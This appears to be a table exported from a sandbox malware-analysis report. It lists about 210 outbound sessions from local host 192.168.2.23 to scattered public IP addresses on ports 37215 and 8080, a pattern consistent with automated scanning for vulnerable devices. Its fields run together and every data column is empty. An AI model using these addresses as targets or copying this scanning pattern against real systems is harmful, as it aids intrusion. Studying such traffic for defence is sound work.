                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27487192.168.2.2345878157.50.133.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27488192.168.2.233915641.25.11.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27489192.168.2.2349516197.177.214.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27490192.168.2.233371641.66.235.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27491192.168.2.2345942151.42.101.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27492192.168.2.2340160105.205.53.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27493192.168.2.234152441.22.106.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27494192.168.2.2360772197.108.14.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27495192.168.2.2336880197.76.103.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27496192.168.2.234348641.213.156.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27497192.168.2.2360936157.187.152.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27498192.168.2.2359862157.159.36.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27499192.168.2.2354516197.35.155.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27500192.168.2.2349126157.68.14.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27501192.168.2.234308441.47.139.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27502192.168.2.234111441.99.122.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27503192.168.2.2360388157.78.25.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27504192.168.2.2360384157.250.164.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27505192.168.2.2355124197.110.207.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27506192.168.2.2347104197.128.106.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27507192.168.2.234743441.151.120.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27508192.168.2.235533441.87.64.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27509192.168.2.2339648197.137.91.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27510192.168.2.2358536197.193.111.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27511192.168.2.235932499.32.35.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27512192.168.2.2340838176.194.214.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27513192.168.2.2356580106.87.21.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27514192.168.2.2353264157.67.70.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27515192.168.2.2354194130.96.128.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27516192.168.2.2338378197.82.204.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27517192.168.2.2355262197.118.94.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27518192.168.2.234875241.46.187.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27519192.168.2.2350498118.66.165.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27520192.168.2.235467641.246.239.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27521192.168.2.234338443.34.159.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27522192.168.2.235359472.249.144.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27523192.168.2.2343448157.162.141.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27524192.168.2.233597893.107.117.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27525192.168.2.2336274197.44.191.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27526192.168.2.2345516157.42.140.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27527192.168.2.233300441.250.45.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27528192.168.2.234214041.155.49.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27529192.168.2.233384641.50.53.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27530192.168.2.234958025.234.242.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27531192.168.2.235378823.215.86.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27532192.168.2.2334194197.184.176.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27533192.168.2.2345820197.95.157.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27534192.168.2.2360824220.68.229.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27535192.168.2.2346686157.210.230.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27536192.168.2.2338748136.51.168.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27537192.168.2.235855441.101.3.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27538192.168.2.2358010157.27.74.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27539192.168.2.2341168197.118.115.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27540192.168.2.2358222157.78.8.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27541192.168.2.2333940157.21.13.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27542192.168.2.2359730160.118.101.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27543192.168.2.2343616157.230.113.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27544192.168.2.2354848115.219.14.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27545192.168.2.233525441.170.41.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27546192.168.2.2347936157.107.7.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27547192.168.2.233896641.191.232.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27548192.168.2.2349062157.7.85.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27549192.168.2.233795498.242.218.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27550192.168.2.2341236157.127.57.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27551192.168.2.2353794197.101.240.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27552192.168.2.2338444212.201.4.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27553192.168.2.234145641.143.182.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27554192.168.2.235469041.170.74.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27555192.168.2.235781041.186.98.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27556192.168.2.2343570157.40.57.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27557192.168.2.2342208157.92.100.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27558192.168.2.2353446197.250.141.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27559192.168.2.2353456157.120.168.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27560192.168.2.235750041.135.36.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27561192.168.2.2339388132.242.44.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27562192.168.2.234843054.83.189.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27563192.168.2.234188837.214.240.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27564192.168.2.233704290.241.11.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27565192.168.2.2350422205.28.218.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27566192.168.2.235245419.40.223.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27567192.168.2.234168467.0.14.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27568192.168.2.234119286.80.229.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27569192.168.2.233856437.4.141.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27570192.168.2.2358932211.128.125.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27571192.168.2.2346426169.135.234.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27572192.168.2.2336880134.81.247.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27573192.168.2.2359318181.85.90.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27574192.168.2.2360990167.197.201.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27575192.168.2.2359804160.99.216.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27576192.168.2.2349692211.234.82.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27577192.168.2.23411388.23.157.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27578192.168.2.2345786136.52.76.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27579192.168.2.23560082.125.143.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27580192.168.2.235241086.187.150.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27581192.168.2.2348492154.149.1.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27582192.168.2.234917886.132.105.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27583192.168.2.235849695.38.178.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27584192.168.2.234234490.77.129.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27585192.168.2.2354164171.221.120.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27586192.168.2.235943264.169.99.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27587192.168.2.233464653.38.50.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27588192.168.2.235292212.155.221.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27589192.168.2.2346794133.121.224.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27590192.168.2.2353620194.196.61.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27591192.168.2.2352448141.185.49.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27592192.168.2.2354242135.192.215.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27593192.168.2.2338832213.73.245.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27594192.168.2.234612627.204.165.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27595192.168.2.2346652213.7.221.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27596192.168.2.2359214102.86.0.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27597192.168.2.2347484161.37.12.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27598192.168.2.2357186159.64.88.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27599192.168.2.2342816143.30.106.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27600192.168.2.235566079.185.154.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27601192.168.2.236082888.131.132.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27602192.168.2.2338642102.111.4.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27603192.168.2.2340432154.182.14.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27604192.168.2.2360796145.142.99.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27605192.168.2.234020650.171.2.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27606192.168.2.2334788123.21.19.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27607192.168.2.2339608165.58.140.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27608192.168.2.2333552102.186.210.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27609192.168.2.2338782189.19.161.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27610192.168.2.234406027.111.154.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27611192.168.2.233696286.47.110.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27612192.168.2.2357220118.117.213.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27613192.168.2.2333268221.244.206.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27614192.168.2.2333182190.35.25.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27615192.168.2.2342978108.234.30.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27616192.168.2.234314085.39.195.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27617192.168.2.2341414154.167.13.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27618192.168.2.234688663.73.4.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27619192.168.2.2337062124.153.212.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27620192.168.2.2347858208.162.65.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27621192.168.2.2339728176.82.195.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27622192.168.2.234819693.56.196.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27623192.168.2.235385236.2.177.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27624192.168.2.235084040.193.51.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27625192.168.2.2340854216.164.70.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27626192.168.2.23477509.65.144.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27627192.168.2.2344302161.169.166.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27628192.168.2.2343486129.180.146.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27629192.168.2.235733086.34.198.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27630192.168.2.23435185.205.204.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27631192.168.2.2347842122.131.168.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27632192.168.2.2332986135.245.203.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27633192.168.2.2343980216.45.17.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27634192.168.2.234721699.115.58.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27635192.168.2.235618295.227.2.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27636192.168.2.2336840169.102.181.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27637192.168.2.2332796120.235.226.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27638192.168.2.2337106162.156.29.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27639192.168.2.2360206172.133.77.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27640192.168.2.2342436171.69.32.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27641192.168.2.2344494193.162.28.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27642192.168.2.23571389.180.158.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27643192.168.2.235696280.84.4.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27644192.168.2.2342512142.70.107.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27645192.168.2.233626484.77.151.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27646192.168.2.2357190140.241.160.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27647192.168.2.2357070193.190.151.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27648192.168.2.2349126159.202.140.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27649192.168.2.234905827.168.127.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27650192.168.2.234003274.233.66.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27651192.168.2.2338890178.86.75.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27652192.168.2.2333528197.186.5.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27653192.168.2.234674623.223.115.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27654192.168.2.2346938143.93.162.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27655192.168.2.234680019.141.160.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27656192.168.2.2344954173.33.224.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27657192.168.2.2346588103.164.242.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27658192.168.2.234988636.214.253.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27659192.168.2.2348006124.93.240.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27660192.168.2.2358666111.102.164.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27661192.168.2.233321662.55.208.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27662192.168.2.2344180143.92.164.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27663192.168.2.233829096.254.244.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27664192.168.2.235698490.40.124.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27665192.168.2.233861249.151.245.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27666192.168.2.2344078166.182.17.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27667192.168.2.234385096.158.172.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27668192.168.2.2350122149.223.226.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27669192.168.2.2354594142.150.147.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27670192.168.2.2346670221.64.238.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27671192.168.2.2343172176.191.110.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27672192.168.2.234088827.20.5.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27673192.168.2.236056475.4.190.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27674192.168.2.2358896181.109.160.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27675192.168.2.234674646.99.76.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27676192.168.2.2348204173.54.125.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27677192.168.2.234783279.171.19.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27678192.168.2.234878691.106.172.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27679192.168.2.2342334159.30.28.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27680192.168.2.2336776140.212.30.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27681192.168.2.2334754114.109.139.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27682192.168.2.235190868.147.238.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27683192.168.2.2356340122.50.100.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27684192.168.2.233729483.185.16.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27685192.168.2.2342832180.180.158.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27686192.168.2.2360040132.198.87.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27687192.168.2.23605764.100.240.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27688192.168.2.2343594204.116.124.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27689192.168.2.2354860157.94.8.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27690192.168.2.2356824121.231.112.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27691192.168.2.2335720196.239.115.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27692192.168.2.234224860.44.151.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27693192.168.2.2356968140.137.122.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27694192.168.2.234258835.147.237.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27695192.168.2.2350392222.198.25.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27696192.168.2.233554273.88.131.2368080
                                                        TimestampBytes transferredDirectionData


